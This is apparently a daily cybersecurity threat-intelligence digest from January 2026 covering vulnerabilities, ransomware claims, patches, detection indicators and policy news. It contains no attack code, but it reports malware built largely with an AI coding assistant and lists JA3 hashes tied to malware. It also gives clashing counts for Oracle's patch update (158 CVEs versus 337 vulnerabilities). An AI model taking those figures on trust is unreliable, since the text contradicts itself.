Daily Threat Intel Digest - 2026-01-21

🔴 Critical Threats & Active Exploitation

[NEW] Chrome 144 patches actively exploitable V8 RCE flaw
Google released Chrome 144 to patch CVE-2026-1220, a high-severity race condition in the V8 JavaScript engine allowing arbitrary code execution. Attackers can craft malicious websites to exploit this flaw and bypass Chrome’s sandbox, enabling credential theft, malware installation, and unauthorized data access [CyberPress; GBHackers]. Users should prioritize immediate updates via Chrome’s settings menu.

[NEW] Azure Private Endpoint flaw enables DoS attacks on cloud resources
A critical architectural vulnerability in Azure’s Private Endpoint deployments allows attackers to cause denial-of-service conditions through DNS resolution manipulation. The issue affects over 5% of Azure storage accounts and critical services including Key Vault and Cosmos DB, where creating a Private Endpoint in one network can disrupt access for resources in other networks [CyberPress; GBHackers]. Organizations should audit hybrid network configurations and implement Azure Resource Graph queries to identify vulnerable deployments.

[NEW] Everest ransomware claims 861GB breach of McDonald’s India systems
The Russian-speaking Everest group allegedly exfiltrated customer personal information and internal documents from McDonald’s India operations, threatening public release unless ransom demands are met. This represents one of the largest breaches of McDonald’s franchise operations globally, following previous incidents in 2017 and 2024 [CyberPress; GBHackers]. The group specializes in “pure extortion” tactics, prioritizing data theft over encryption.

🎯 Threat Actor Activity & Campaigns

[UPDATE] VoidLink malware confirmed as AI-generated framework
New analysis reveals the VoidLink cloud malware framework was predominantly developed using AI assistance, with exposed OPSEC failures showing source code generated via TRAE SOLO AI assistant. The framework achieved 88,000 lines of code within weeks of inception in late 2025, demonstrating how AI enables single actors to create previously team-level capabilities [Check Point; BleepingComputer]. This confirms suspicions from initial reports and marks the first documented advanced malware primarily generated by AI.

[NEW] Ransomware gangs expand multi-sector targeting
New ransomware claims include: Sarcoma targeting Italian software firm MecMatica [DeXpose], WorldLeaks attacking Taiwan’s Might Electronic Co. [DeXpose], TheGentlemen breaching Italian snack producer San Carlo Gruppo Alimentare [DeXpose], and Qilin compromising Spain’s Altius Geotecnia y Obras Especiales [DeXpose]. All groups threaten public data leaks unless ransoms are paid.

⚠️ Vulnerabilities & Patches

[NEW] Oracle January CPU addresses 158 CVEs, including critical Java SSRF
Oracle’s first 2026 Critical Patch Update fixes 337 vulnerabilities across 30 product families, with 27 rated critical. Notably, CVE-2026-21945 addresses a high-severity server-side request forgery (SSRF) flaw in Java’s TLS handshake process that allows attackers to trigger denial-of-service conditions via malicious client certificates [Tenable; Tenable Advisory]. Organizations using mutual TLS (mTLS) should prioritize Java updates immediately.

[NEW] WordPress ACF Extended plugin exposes 50K+ sites to admin takeover
A critical privilege escalation vulnerability (CVE-2025-14533) in the Advanced Custom Fields Extended plugin allows unauthenticated attackers to gain administrative permissions by abusing form-based user creation. With 100K active installations, approximately 50K sites remain vulnerable as patch uptake remains low [BleepingComputer]. Sites using ‘Create User’ or ‘Update User’ forms with role fields should update to version 0.9.2.2 immediately.

🛡️ Defense & Detection

[NEW] JA3 fingerprinting resurgence for threat hunting
Security researchers advocate renewed use of JA3 TLS fingerprints to identify attacker infrastructure and tools. When combined with context like SNI, JA3S, and URI patterns, JA3 enables clustering of malicious activity across campaigns, early detection of new tooling via frequency analysis, and pivoting between malware samples [ANY.RUN]. Key suspicious hashes include Remcos RAT (a85be79f7b569f1df5e6087b69deb493) and Skuld data exfiltration tools (e69402f870ecf542b4f017b0ed32936a).

[NEW] PowerShell.Exposed launches community detection indicators
A new community-driven repository introduces 89 regex-based indicators for detecting suspicious PowerShell payloads, covering MITRE ATT&CK techniques including lateral movement and credential dumping. The project provides specialized detection modeling beyond atomic alerts, enabling correlation across Script Block Logging and XDR telemetry [Detect FYI]. Organizations can integrate indicators into SIEM platforms via the free detection engine.

📋 Policy & Industry News

[NEW] EU proposes phase-out of high-risk telecom suppliers
The European Commission announced new cybersecurity legislation mandating removal of high-risk suppliers from telecommunications networks and critical infrastructure. While not naming specific companies, the proposal targets Chinese tech firms like Huawei and ZTE, following failures in voluntary 5G security measures [SecurityWeek; BleepingComputer]. The revised Cybersecurity Act also empowers ENISA for early threat alerts and ransomware response.

[NEW] Congressional appropriations extend cyber information sharing law
U.S. congressional appropriators announced funding legislation extending the Cybersecurity Information Sharing Act of 2015 through September 2026, providing liability protections for threat intelligence sharing. The package also allocates $2.6 billion to CISA, including $39.6M for election security programs and directives maintaining staffing levels [CyberScoop]. The State and Local Cybersecurity Grants Program receives extension through fiscal 2026.